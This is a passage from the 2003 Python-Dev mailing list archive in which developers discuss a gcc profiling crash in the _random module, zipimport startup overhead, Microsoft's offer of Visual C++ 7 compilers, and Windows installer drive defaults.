[New Thread 1074963072 (LWP 28408)]

Program received signal SIGILL, Illegal instruction.
[Switching to Thread 1074963072 (LWP 28408)]
0x08109aa0 in subtype_getsets_full ()
(gdb) where
#0  0x08109aa0 in subtype_getsets_full ()
#1  0x4001c743 in random_new (type=0x4001c738, args=0x4012c02c, kwds=0x0)
               at /usr/src/Python-2.3b1/Modules/_randommodule.c:439
(gdb) ptype subtype_getsets_full
type = struct PyGetSetDef {
[...]

I'm recompiling now to see if it was just a bogon strike.. surely somebody
else has tested on redhat9!  nope, recompiled and I still have the problem.
and I can't get the debugger to stop at the top of random_new either.

jeff


From neal@metaslash.com  Tue May  6 19:37:21 2003
From: neal@metaslash.com (Neal Norwitz)
Date: Tue, 06 May 2003 14:37:21 -0400
Subject: [Python-Dev] Startup time
In-Reply-To: <200305062020.42734.aleax@aleax.it>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net>
 <20030506162127.GC12791@unpythonic.net>
 <m34r487z85.fsf@mira.informatik.hu-berlin.de>
 <200305062020.42734.aleax@aleax.it>
Message-ID: <20030506183721.GC1340@epoch.metaslash.com>

On Tue, May 06, 2003 at 08:20:42PM +0200, Alex Martelli wrote:
> On Tuesday 06 May 2003 07:37 pm, Martin v. Löwis wrote:
> > Jeff Epler <jepler@unpythonic.net> writes:
> > > Comparing 2.2 and 2.3, there are a lot of files opened in 2.3 that
> > > aren't in 2.2.
>
> [alex@lancelot blm]$ strace -e stat64 python2.2 -S -c pass 2>&1 | wc -l
>      18
> [alex@lancelot blm]$ strace -e stat64 python2.3 -S -c pass 2>&1 | wc -l
>      71

I think many of the extra stat/open calls are due to zipimports.

I don't have python23.zip, but it's still looking for a bunch
of extra files that can't exist (in python23.zip).  Perhaps
if the zip file doesn't exist, we can short circuit the remaining
calls to open()?

stat64("/home/neal/local/lib/python23.zip/warnings", 0xbfffebc0) =
=3D -1 ENOENT (No such file or directory)
open("/home/neal/local/lib/python23.zip/warnings.so", O_RDONLY|O_LARG=
EFILE) =3D -1 ENOENT (No such file or directory)
open("/home/neal/local/lib/python23.zip/warningsmodule.so", O_RDONLY|=
O_LARGEFILE) =3D -1 ENOENT (No such file or directory)
open("/home/neal/local/lib/python23.zip/warnings.py", O_RDONLY|O_LARG=
EFILE) =3D -1 ENOENT (No such file or directory)
open("/home/neal/local/lib/python23.zip/warnings.pyc", O_RDONLY|O_LAR=
GEFILE) =3D -1 ENOENT (No such file or directory)

Neal



From nas@python.ca  Tue May  6 19:41:07 2003
From: nas@python.ca (Neil Schemenauer)
Date: Tue, 6 May 2003 11:41:07 -0700
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305061826.h46IQ7605750@odiug.zope.com>
References: <200305061826.h46IQ7605750@odiug.zope.com>
Message-ID: <20030506184107.GA21470@glacier.arctrix.com>

Guido van Rossum wrote:
> I can see advantages and disadvantages of moving to VC 7; I'm sure the
> VC 7 compiler is more standard-compliant and generates faster code,
> but a disadvantage is that you can't apparently link binaries built
> with VC 6 to a program built with VC 7, meaning that 3rd party
> extensions will have to be recompiled with VC 7 as well.

Can distutils use (or be made to use) the free command line VC 7 tools?
Also, does this affect whether extensions can be compiled by Mingw?  It
would be nice if people could continue building extensions on Windows
using free tools.

  Neil


From guido@python.org  Tue May  6 19:45:50 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 06 May 2003 14:45:50 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: Your message of "Tue, 06 May 2003 11:41:07 PDT."
 <20030506184107.GA21470@glacier.arctrix.com>
References: <200305061826.h46IQ7605750@odiug.zope.com>
 <20030506184107.GA21470@glacier.arctrix.com>
Message-ID: <200305061845.h46Ijo106044@odiug.zope.com>

> > I can see advantages and disadvantages of moving to VC 7; I'm sure the
> > VC 7 compiler is more standard-compliant and generates faster code,
> > but a disadvantage is that you can't apparently link binaries built
> > with VC 6 to a program built with VC 7, meaning that 3rd party
> > extensions will have to be recompiled with VC 7 as well.
> 
> Can distutils use (or be made to use) the free command line VC 7 tools?

That would be a project, but his implication was that the compilers
are usable as command line tools, so I'm confident it can be done.

> Also, does this affect whether extensions can be compiled by Mingw?
> It would be nice if people could continue building extensions on
> Windows using free tools.

I know nothing about Mingw.  Anyone who does please speak up if this
would affect them or not.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From phil@riverbankcomputing.co.uk  Tue May  6 19:48:03 2003
From: phil@riverbankcomputing.co.uk (Phil Thompson)
Date: Tue, 6 May 2003 19:48:03 +0100
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305061826.h46IQ7605750@odiug.zope.com>
References: <200305061826.h46IQ7605750@odiug.zope.com>
Message-ID: <200305061948.03757.phil@riverbankcomputing.co.uk>

On Tuesday 06 May 2003 7:26 pm, Guido van Rossum wrote:
> A month ago at Python UK in Oxford (which was colocated with C and C++
> standardization meetings as well as a general C and C++ users
> conference) I met with some folks from Microsoft's VC development
> team, including the project lead, Nick Hodapp.  I told Nick that
> Python for Windows was still built using VC 6.  He pointed out that
> the actual compilers (not the GUI) from VC 7 are freely downloadable.
>
> More recently, Nick sent me an email offering to donate copies of VC 7
> to the "key developers".  I count Tim, myself and Mark Hammond among
> the key developers.  Is there anyone else who would count themselves
> among those?
>
> I presume he's offering the pro version, which has a real optimizer,
> unlike the "standard" version that was kindly donated by Bjorn
> Pettersen.
>
> I can see advantages and disadvantages of moving to VC 7; I'm sure the
> VC 7 compiler is more standard-compliant and generates faster code,
> but a disadvantage is that you can't apparently link binaries built
> with VC 6 to a program built with VC 7, meaning that 3rd party
> extensions will have to be recompiled with VC 7 as well.  I have no
> idea how many projects this will affect (don't worry about Zope Corp
> :-).  Maybe we should try to include those 3rd party developers in the
> deal.  (I think Robin Dunn would be affected, wxPython has a Windows
> distribution.)
>
> If you think this is a bad idea or if you would like to qualify for a
> compiler donation, please follow up!

How do we get hold of the free VC 7 compilers?

Phil


From theller@python.net  Tue May  6 19:48:12 2003
From: theller@python.net (Thomas Heller)
Date: 06 May 2003 20:48:12 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <20030506184107.GA21470@glacier.arctrix.com>
References: <200305061826.h46IQ7605750@odiug.zope.com>
 <20030506184107.GA21470@glacier.arctrix.com>
Message-ID: <he87x66r.fsf@python.net>

Neil Schemenauer <nas@python.ca> writes:

> Guido van Rossum wrote:
> > I can see advantages and disadvantages of moving to VC 7; I'm sure the
> > VC 7 compiler is more standard-compliant and generates faster code,
> > but a disadvantage is that you can't apparently link binaries built
> > with VC 6 to a program built with VC 7, meaning that 3rd party
> > extensions will have to be recompiled with VC 7 as well.
> 
> Can distutils use (or be made to use) the free command line VC 7 tools?

The only problem distutils has is to find the compiler and the
environment it needs. Currently it relies on (undocumented) registry
entries (for VC6), and there's a patch somewhere on SF for the registry
entries for VC7.

I like the idea of using VC7 (as much as I dislike the VC7 gui itself).
'Professional' windows developers have VC7 anyway, it's included in MSDN
professional.

Thomas



From logistix@cathoderaymission.net  Tue May  6 19:52:32 2003
From: logistix@cathoderaymission.net (logistix)
Date: Tue, 6 May 2003 13:52:32 -0500 (CDT)
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305061826.h46IQ7605750@odiug.zope.com>
Message-ID: <Pine.LNX.4.44.0305061347360.3480-100000@oblivion.cathoderaymission.net>

On Tue, 6 May 2003, Guido van Rossum wrote:

> A month ago at Python UK in Oxford (which was colocated with C and C++
> standardization meetings as well as a general C and C++ users
> conference) I met with some folks from Microsoft's VC development
> team, including the project lead, Nick Hodapp.  I told Nick that
> Python for Windows was still built using VC 6.  He pointed out that
> the actual compilers (not the GUI) from VC 7 are freely downloadable.
> 
> More recently, Nick sent me an email offering to donate copies of VC 7
> to the "key developers".  I count Tim, myself and Mark Hammond among
> the key developers.  Is there anyone else who would count themselves
> among those?
> 
> I presume he's offering the pro version, which has a real optimizer,
> unlike the "standard" version that was kindly donated by Bjorn
> Pettersen.
> 
> I can see advantages and disadvantages of moving to VC 7; I'm sure the
> VC 7 compiler is more standard-compliant and generates faster code,
> but a disadvantage is that you can't apparently link binaries built
> with VC 6 to a program built with VC 7, meaning that 3rd party
> extensions will have to be recompiled with VC 7 as well.  I have no
> idea how many projects this will affect (don't worry about Zope Corp
> :-).  Maybe we should try to include those 3rd party developers in the
> deal.  (I think Robin Dunn would be affected, wxPython has a Windows
> distribution.)
> 
> If you think this is a bad idea or if you would like to qualify for a
> compiler donation, please follow up!
> 
> --Guido van Rossum (home page: http://www.python.org/~guido/)
> 
> _______________________________________________
> Python-Dev mailing list
> Python-Dev@python.org
> http://mail.python.org/mailman/listinfo/python-dev
> 

Visual Studio 2003 came out a few weeks ago.  I honestly don't know if 
it's considered VC8 or just VC7.1 with the same backend compilers.  But if
you're going to upgrade, you might as well go all the way.

Also, I'm assuming 2.3 will still be compiled on 6.0, right?




From guido@python.org  Tue May  6 19:55:15 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 06 May 2003 14:55:15 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: Your message of "Tue, 06 May 2003 19:48:03 BST."
 <200305061948.03757.phil@riverbankcomputing.co.uk>
References: <200305061826.h46IQ7605750@odiug.zope.com>
 <200305061948.03757.phil@riverbankcomputing.co.uk>
Message-ID: <200305061855.h46ItFZ06217@odiug.zope.com>

> How do we get hold of the free VC 7 compilers?

Here's the info Nick sent me:

| We offer as part of the .NET Framework SDK each of the compilers that
| comprise our Visual Studio tool - including C++.  The caveat here is
| that we don't yet ship the full CRT or STL with this distribution -
| this will be changing.  Also, the 64bit C++ compilers ship for free as
| part of the Windows Platform SDK.  All of this is available on
| msdn.microsoft.com.
[...]
| Here are the links to the SDKs.  But so you aren't surprised, these are
| NOT low-overhead downloads or installs...
| 
| .NET Framework 1.1
| 
| http://www.msdn.microsoft.com/netframework/downloads/howtoget.aspx
| 
| Platform SDK
| 
| http://msdn.microsoft.com/library/default.asp?url=/library/en-us/sdkintro/sdkintro/obtaining_the_complete_sdk.asp

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@comcast.net  Tue May  6 19:56:52 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 06 May 2003 14:56:52 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305061948.03757.phil@riverbankcomputing.co.uk>
Message-ID: <BIEJKCLHCIOIHAGOKOLHCEIAFJAA.tim.one@comcast.net>

[Phil Thompson]
> How do we get hold of the free VC 7 compilers?

Part of the 100+ MB .NET Framework 1.1 SDK:

http://www.msdn.microsoft.com/netframework/downloads/howtoget.aspx

Note that this requires Win2K minimum.


From jepler@unpythonic.net  Tue May  6 19:57:50 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Tue, 6 May 2003 13:57:50 -0500
Subject: RedHat 9 _random failure under -pg (was Re: [Python-Dev] Startup time)
Message-ID: <20030506185750.GB27125@unpythonic.net>

On Tue, May 06, 2003 at 01:36:00PM -0500, Jeff Epler wrote:
> (gdb) run -c "import random"
> Starting program: /usr/src/Python-2.3b1/python -c "import random"
> [New Thread 1074963072 (LWP 28408)]
> 
> Program received signal SIGILL, Illegal instruction.
> [Switching to Thread 1074963072 (LWP 28408)]
> 0x08109aa0 in subtype_getsets_full ()
> (gdb) where
> #0  0x08109aa0 in subtype_getsets_full ()
> #1  0x4001c743 in random_new (type=0x4001c738, args=0x4012c02c, kwds=0x0)
>                at /usr/src/Python-2.3b1/Modules/_randommodule.c:439
> (gdb) ptype subtype_getsets_full
> type = struct PyGetSetDef {
> [...]

gcc is generating plainly bogus code for this simple function
random_new:
00001738 <random_new>:
    1738:       55                      push   %ebp
    1739:       89 e5                   mov    %esp,%ebp
    173b:       56                      push   %esi
    173c:       53                      push   %ebx
    173d:       ff 93 7c 00 00 00       call   *0x7c(%ebx)

(for those of you who don't read x86 assembly, the first 4 instructions
are part of a standard function prologue.  The fifth instruction is
a call through a function pointer, but the register's value at this
point is undefined.  This is not the call to type->tp_alloc(); the correct
code for that is just below)

Well, this may have been false alarm -- when I removed -pg from OPT in
the Makefile, './python -c "import random"' works.  So this is a problem
only when profiling is enabled.  Is this intended to work?

In any case, the fact that the disassembly is so plainly bogus tends to
imply that this is a gcc bug, not anything that Python can fix.

Jeff


From just@letterror.com  Tue May  6 19:59:02 2003
From: just@letterror.com (Just van Rossum)
Date: Tue,  6 May 2003 20:59:02 +0200
Subject: [Python-Dev] Startup time
In-Reply-To: <20030506183721.GC1340@epoch.metaslash.com>
Message-ID: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]>

Neal Norwitz wrote:

> I think many of the extra stat/open calls are due to zipimports.
> 
> I don't have python23.zip, but it's still looking for a bunch
> of extra files that can't exist (in python23.zip).  Perhaps
> if the zip file doesn't exist, we can short circuit the remaining
> calls to open()?

I think we should, although I wouldn't know off hand how to do that.

There's still some nice-to-have PEP302 stuff that remains to be
implemented, that could actually help solve this problem. Currently
there are no real importer objects for the builtin import mechanisms: a
value of None for a path item in sys.path_importer_cache means: use the
builtin importer. If there _was_ a true builtin importer object, None
could mean: no importer can handle this path item, skip it. See also
python.org/sf/692884. I hope to be able to work on this before 2.3b2.
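
Roughly what I mean, as a sketch only (the class and hook names below
are made up; the real thing would live in the import machinery rather
than in user code):

    import os
    import sys

    class NullImporter:
        # Never finds anything; once cached in sys.path_importer_cache,
        # later imports skip the dead path item without further
        # stat()/open() calls.
        def find_module(self, fullname, path=None):
            return None

    def skip_missing_path_items(item):
        if item and not os.path.exists(item):
            return NullImporter()
        raise ImportError   # let the builtin machinery handle real paths

    sys.path_hooks.append(skip_missing_path_items)
    sys.path_importer_cache.clear()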

> stat64("/home/neal/local/lib/python23.zip/warnings", 0xbfffebc0) = -1 ENOENT (No such file or directory)
> open("/home/neal/local/lib/python23.zip/warnings.so", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)
> open("/home/neal/local/lib/python23.zip/warningsmodule.so", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)
> open("/home/neal/local/lib/python23.zip/warnings.py", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)
> open("/home/neal/local/lib/python23.zip/warnings.pyc", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)

You could try editing site.py so it (as it used to) removes path items
that don't exist on the file system. Except this probably only helps if
you'd do this _before_ os.py is imported, as os.py pulls in quite a few
modules. Hm, chicken and egg... Or disable the code that adds the
zipfile to sys.path in Modules/getpath.c, and compare the number of stat
calls.
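
The site.py experiment would look something like this (just a sketch,
and with the chicken-and-egg caveat above that os is already imported by
the time it runs):

    import os
    import sys

    # Prune sys.path entries that don't exist on the file system, as
    # site.py used to do; '' (the current directory) is left alone.
    sys.path[:] = [item for item in sys.path
                   if item == '' or os.path.exists(item)]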

Just


From tim@zope.com  Tue May  6 20:00:03 2003
From: tim@zope.com (Tim Peters)
Date: Tue, 6 May 2003 15:00:03 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <Pine.LNX.4.44.0305061347360.3480-100000@oblivion.cathoderaymission.net>
Message-ID: <BIEJKCLHCIOIHAGOKOLHOEIAFJAA.tim@zope.com>

[logistix]
> ...
> Also, I'm assuming 2.3 will still be compiled on 6.0, right?

The PythonLabs 2.3 Windows distribution will be compiled with MSVC 6,
barring an unbroken chain of miracles.



From guido@python.org  Tue May  6 20:01:01 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 06 May 2003 15:01:01 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: Your message of "Tue, 06 May 2003 13:52:32 CDT."
 <Pine.LNX.4.44.0305061347360.3480-100000@oblivion.cathoderaymission.net>
References: <Pine.LNX.4.44.0305061347360.3480-100000@oblivion.cathoderaymission.net>
Message-ID: <200305061901.h46J11306259@odiug.zope.com>

> Visual Studio 2003 came out a few weeks ago.  I honestly don't know if 
> it's considered VC8 or just VC7.1 with the same backend compilers.  But if 
> you're going to upgrade, you might as well go all the way.

Good question.

> Also, I'm assuming 2.3 will still be compiled on 6.0, right?

Hm, I was thinking that 2.3 final could be built using 7.x if Nick can
get us the donated copies fast enough.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com  Tue May  6 20:12:13 2003
From: skip@pobox.com (Skip Montanaro)
Date: Tue, 6 May 2003 14:12:13 -0500
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305061901.h46J11306259@odiug.zope.com>
References: <Pine.LNX.4.44.0305061347360.3480-100000@oblivion.cathoderaymission.net>
 <200305061901.h46J11306259@odiug.zope.com>
Message-ID: <16056.2317.124886.963460@montanaro.dyndns.org>

    >> Also, I'm assuming 2.3 will still be compiled on 6.0, right?

    Guido> Hm, I was thinking that 2.3 final could be built using 7.x if
    Guido> Nick can get us the donated copies fast enough.

I can see the downside (next to no experience with 7.x, and perhaps none
before the final release).  What's the upside?

Skip



From skip@pobox.com  Tue May  6 20:18:24 2003
From: skip@pobox.com (Skip Montanaro)
Date: Tue, 6 May 2003 14:18:24 -0500
Subject: [Python-Dev] pyconfig.h not regenerated by "config.status
 --recheck"
In-Reply-To: <m3znm06kl2.fsf@mira.informatik.hu-berlin.de>
References: <16055.57554.364845.689049@montanaro.dyndns.org>
 <m3znm06kl2.fsf@mira.informatik.hu-berlin.de>
Message-ID: <16056.2688.72423.251200@montanaro.dyndns.org>

    >> This generated pyconfig.h.  It would thus appear that config.status
    >> shouldn't be used by developers.  Apparently one of the other flags
    >> it appends to the generated configure command suppresses generation
    >> of pyconfig.h (and maybe other files).

    Martin> Can you find out whether this is related to the fact that you
    Martin> are building in a separate build directory?

I just confirmed that it's not related to the separate build directory.
When you run config.status --recheck it reruns your latest configure command
with the extra flags --no-create and --no-recursion.  Without rummaging
around in the configure file my guess is the --no-create flag is the
culprit.  

So, a word to the wise: avoid config.status --recheck.

Skip


From tim.one@comcast.net  Tue May  6 20:17:28 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 06 May 2003 15:17:28 -0400
Subject: [Python-Dev] Windows installer request...
In-Reply-To: <60FB8BB7F0EFC7409B75EEEC13E20192022DE23A@admin56.narex.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHMEICFJAA.tim.one@comcast.net>

[Bjorn Pettersen]
> Most installers default to the system drive, so I didn't even look the
> first time. I am able to change it manually.
> ...
> It should be as easy as (platforms that don't have %systemdrive% could
> only install to C:):
>
>  item: Get Environment Variable
>    Variable=OSDRIVE
>    Environment=SystemDrive
>    Default=C:
>  end
>
> However, you might have to do
>
>  item: Get Registry Key Value
>    Variable=OSDRIVE
>    Key=System\CurrentControlSet\Control\Session Manager\Environment
>    Value Name=SystemDrive
>    Flags=00000100
>    Default=C:
>  end
>
> (not sure about the Flags parameter) I couldn't find much documentation,
> and the example I'm looking at is a little "divided" about which it
> should use... I think it tries the first one, and falls back on the
> second(?) (http://ibinstall.defined.net/dl_scripts.htm,
> script_6016.zip/IBWin32Setup.wse).
>
> Also, it looks like you want to use %SYS32% to get to the windows system
> directory (on WinXP, it's c:\windows\system32, which doesn't seem to be
> listed anywhere...)

Enough already <wink/frown>:  I don't have time to try umpteen different
things here, or really even one.

What I did do is build an installer *just* removing the hard-coded
Wizard-generated "C:" prefix.  Martin tried that and said it worked for him.
It doesn't hurt me.  If it works for you too, I'll commit the change:

    ftp://ftp.python.org/pub/tmp/experimental.exe

Please give that a try.  It's an incoherent mix of files, so please use a
junk name for the installation directory and program startup group (or
simply abort the install after you see whether it suggested a drive you
approve of).

> I can't figure out how you're building the installer however. If you can
> point me in the right direction I can test it on my special WinXP,
> regular WinXP, Win98, Win2k, and maybe WinNT4 (I think we still have one
> around :-).

.wse files aren't intended to be edited by hand (although we all do,
sometimes).  Instead, they're input to Wise's commercial GUI, which displays
their contents in a nice block-indented, color-coded way.  "flags" aren't
documented, and the GUI never shows them to you -- they correspond to the
on/off status of various checkboxes in various GUI dialogs.  We use Wise
8.14 to build the installer.  If you have Wise, you open the python20.wse
file using it, and click the "Compile" button in the GUI.  If you don't have
Wise, I suppose you guess what Wise would do if you did have it <wink>.



From brian@sweetapp.com  Tue May  6 20:24:31 2003
From: brian@sweetapp.com (Brian Quinlan)
Date: Tue, 06 May 2003 12:24:31 -0700
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <16056.2317.124886.963460@montanaro.dyndns.org>
Message-ID: <007e01c31405$1ea52fc0$21795418@dell1700>

> I can see the downside (next to no experience with 7.x, and perhaps none
> before the final release).  What's the upside?

It's free and more standards compliant. 

Cheers,
Brian



From martin@v.loewis.de  Tue May  6 20:21:41 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 06 May 2003 21:21:41 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305061826.h46IQ7605750@odiug.zope.com>
References: <200305061826.h46IQ7605750@odiug.zope.com>
Message-ID: <m3ptmv6fui.fsf@mira.informatik.hu-berlin.de>

Guido van Rossum <guido@python.org> writes:

> More recently, Nick sent me an email offering to donate copies of VC 7
> to the "key developers".  I count Tim, myself and Mark Hammond among
> the key developers.  Is there anyone else who would count themselves
> among those?

Does he already have the copies, or would he purchase them/donate the
money?

> If you think this is a bad idea or if you would like to qualify for a
> compiler donation, please follow up!

If the money isn't spent yet, I think it would be better spent on
copies of VC 7.1 (aka .NET 2003). Reportedly, this compiler fixes a
number of bugs of the 7.0 release, i.e. it crashes less frequently.
I'm still uncertain what the binary compatibility issues are, but I
have reason to assume that 7.0 and 7.1 are binary compatible.

Before getting multiple copies of the compiler, you should double
check that you can actually produce a Windows installer for that
compiler. Notice that there is a particular problem hidden here:

You will have to ship the C runtime (MSVCR7.DLL) with the
installer. However, Microsoft does *not* give you permission to
include the DLL file. Instead, they provide a Windows installer
snippet which you must "use" (I believe in the sense of "execute on
the target machine"). The installer snippet will check for versions,
deal with DLL caches, etc. Microsoft has a procedure for combining
installer snippets into full installer files. They acknowledge the
existence of other tools that make installable binaries, but mandate
that these tools perform the same procedures. So you should check
whether your copy of Wise can deal with these issues.

If you find it could actually work, I'm +0 on accepting the donation
(though I won't need a copy myself). You have to switch sooner or
later, anyway, so you might as well switch now instead of later.  The
advantage I see for Python itself is that IPv6 would now work on
Windows. The disadvantage I see is that distutils would need to get
updated.

If you think that 2.3 won't be built with 7.x anyway, you might as
well reject the donation, and hope the donor will still be there to
offer VC 7.2/8.0.

Regards,
Martin


From tim.one@comcast.net  Tue May  6 20:20:34 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 06 May 2003 15:20:34 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305061901.h46J11306259@odiug.zope.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHCEIEFJAA.tim.one@comcast.net>

[Guido]
> Hm, I was thinking that 2.3 final could be built using 7.x if Nick can
> get us the donated copies fast enough.

As I said, the PythonLabs Windows 2.3 installer will be compiled using MSVC
6, barring an unbroken chain of miracles <wink>.



From martin@v.loewis.de  Tue May  6 20:25:20 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 06 May 2003 21:25:20 +0200
Subject: RedHat 9 _random failure under -pg (was Re: [Python-Dev] Startup time)
In-Reply-To: <20030506185750.GB27125@unpythonic.net>
References: <20030506185750.GB27125@unpythonic.net>
Message-ID: <m3llxj6fof.fsf@mira.informatik.hu-berlin.de>

Jeff Epler <jepler@unpythonic.net> writes:

> Well, this may have been false alarm -- when I removed -pg from OPT in
> the Makefile, './python -c "import random"' works.  So this is a problem
> only when profiling is enabled.  Is this intended to work?

You mean, is the gcc option -pg supposed to work? As a Python
developer: How am I supposed to know? As a gcc developer: yes,
certainly.

> In any case, the fact that the disassembly is so plainly bogus tends to
> imply that this is a gcc bug, not anything that Python can fix.

That seems to be the case, yes. Python can only work around it, but in
this case, the work-around seems trivial.

Regards,
Martin



From gtalvola@nameconnector.com  Tue May  6 20:27:11 2003
From: gtalvola@nameconnector.com (Geoffrey Talvola)
Date: Tue, 6 May 2003 15:27:11 -0400
Subject: [Python-Dev] MS VC 7 offer
Message-ID: <61957B071FF421419E567A28A45C7FE59AF419@mailbox.nameconnector.com>

Guido van Rossum wrote:
> I can see advantages and disadvantages of moving to VC 7; I'm sure the
> VC 7 compiler is more standard-compliant and generates faster code,
> but a disadvantage is that you can't apparently link binaries built
> with VC 6 to a program built with VC 7, meaning that 3rd party
> extensions will have to be recompiled with VC 7 as well.

If that's really true then my vote would be against switching to VC 7.

My company uses VC 6 extensively and we have no plans to upgrade to VC 7.
Our Python programs make extensive use of .pyd's compiled with VC6, and we
also embed the Python interpreter within our C++ programs.  It would be
_very_ painful for us to upgrade our world to VC7, and if Python switched to
VC 7, we'd probably be forced to simply compile our own custom version of
Python (and the 3rd-party extension DLLs we use) with VC6.

So there's one data point for you...

- Geoff


From skip@pobox.com  Tue May  6 20:31:16 2003
From: skip@pobox.com (Skip Montanaro)
Date: Tue, 6 May 2003 14:31:16 -0500
Subject: [Python-Dev] SF CVS offline
Message-ID: <16056.3460.431223.466945@montanaro.dyndns.org>

It appears SF CVS is offline (as of 2:30PM Central Daylight Time).  I
noticed this when I was prompted for a CVS password for the first time in
ages (and which I can't remember).  I went poking around for help and came
across this page:

    http://sourceforge.net/docman/display_doc.php?docid=2352&group_id=1

which says, in part:

    Project CVS Services:    Offline; unplanned maintenance (follow-up from
                             2003-05-05) in-progress 

FYI.

Skip


From skip@pobox.com  Tue May  6 20:33:22 2003
From: skip@pobox.com (Skip Montanaro)
Date: Tue, 6 May 2003 14:33:22 -0500
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <007e01c31405$1ea52fc0$21795418@dell1700>
References: <16056.2317.124886.963460@montanaro.dyndns.org>
 <007e01c31405$1ea52fc0$21795418@dell1700>
Message-ID: <16056.3586.553248.689395@montanaro.dyndns.org>

    >> I can see the downside (next to no experience with 7.x, and perhaps
    >> none before the final release).  What's the upside?

    Brian> It's free and more standards compliant. 

Then I suggest we have at least one beta which is built using it.

Skip



From brian@sweetapp.com  Tue May  6 20:53:56 2003
From: brian@sweetapp.com (Brian Quinlan)
Date: Tue, 06 May 2003 12:53:56 -0700
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <16056.3586.553248.689395@montanaro.dyndns.org>
Message-ID: <007f01c31409$3a5f9670$21795418@dell1700>

Brian> It's free and more standards compliant.
> 
> Then I suggest we have at least one beta which is built using it.

Don't get me wrong; I think that moving to VC7 for Python 2.3 would be a
mistake if VC6-compiled extension modules are not binary compatible. My
understanding was that static libraries are not compatible but that
dynamic ones are. I spent a few minutes with google but wasn't able to
find out.

Assuming that VC6 and VC7 are not binary compatible, here are my
concerns:

1. 3rd party extension developers will have to switch very quickly to be
   ready for the 2.3 release
2. Some 3rd party extension developers may have already released
   binaries for Python 2.3, based on the understanding that there won't
   be any additional API changes after the first beta (barring a
   disaster).
3. I believe that the installer normally preserves site-packages when
   doing an upgrade? If so, the user is going to be left with extension
   modules that won't work.

Cheers,
Brian



From fdrake@acm.org  Tue May  6 20:57:04 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Tue, 6 May 2003 15:57:04 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <007f01c31409$3a5f9670$21795418@dell1700>
References: <16056.3586.553248.689395@montanaro.dyndns.org>
 <007f01c31409$3a5f9670$21795418@dell1700>
Message-ID: <16056.5008.75631.677019@grendel.zope.com>

Brian Quinlan writes:
 > 1. 3rd party extension developers will have to switch very quickly to be
 >    ready for the 2.3 release

A very real issue, to be sure.

 > 2. Some 3rd party extension developers may have already released 
 >    binaries for Python 2.3, based on the understanding that there won't 
 >    be any additional API changes after the first beta (barring a 
 >    disaster). 

I'm not convinced that's a huge problem, though it could be an
annoyance.

 > 3. I believe that the installer normally preserves site-packages when
 >    doing an upgrade? If so, the user is going to be left with extension
 >    modules that won't work.

Yes, but site-packages is specific to the major.minor version of
Python, so it would only bite people going from an alpha/beta to a
final release, not from major.minor-1.  Is this really an issue?


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From pje@telecommunity.com  Tue May  6 20:58:34 2003
From: pje@telecommunity.com (Phillip J. Eby)
Date: Tue, 06 May 2003 15:58:34 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305061845.h46Ijo106044@odiug.zope.com>
References: <Your message of "Tue, 06 May 2003 11:41:07 PDT." <20030506184107.GA21470@glacier.arctrix.com>
 <200305061826.h46IQ7605750@odiug.zope.com>
 <20030506184107.GA21470@glacier.arctrix.com>
Message-ID: <5.1.1.6.0.20030506155456.01f9c220@telecommunity.com>

At 02:45 PM 5/6/03 -0400, Guido van Rossum wrote:

> > Also, does this affect whether extensions can be compiled by Mingw?
> > It would be nice if people could continue building extensions on
> > Windows using free tools.
>
>I know noting about Mingw.  Anyone who does please speak up if this
>would affect them or not.

I build my extensions on Windows 98 with MinGW.  I don't know if VC6 vs. 
VC7 makes a difference or not, since I don't own either one.

I think someone said something about the free VC7 requiring Win2K?  That 
seems to me like a dealbreaker for switching from MinGW to VC7, even if the 
VC7 is free-as-in-beer.



From skip@pobox.com  Tue May  6 21:01:51 2003
From: skip@pobox.com (Skip Montanaro)
Date: Tue, 6 May 2003 15:01:51 -0500
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <007f01c31409$3a5f9670$21795418@dell1700>
References: <16056.3586.553248.689395@montanaro.dyndns.org>
 <007f01c31409$3a5f9670$21795418@dell1700>
Message-ID: <16056.5295.907462.399304@montanaro.dyndns.org>

    Brian> Assuming that VC6 and VC7 are not binary compatible, here are my
    Brian> concerns:
    ...

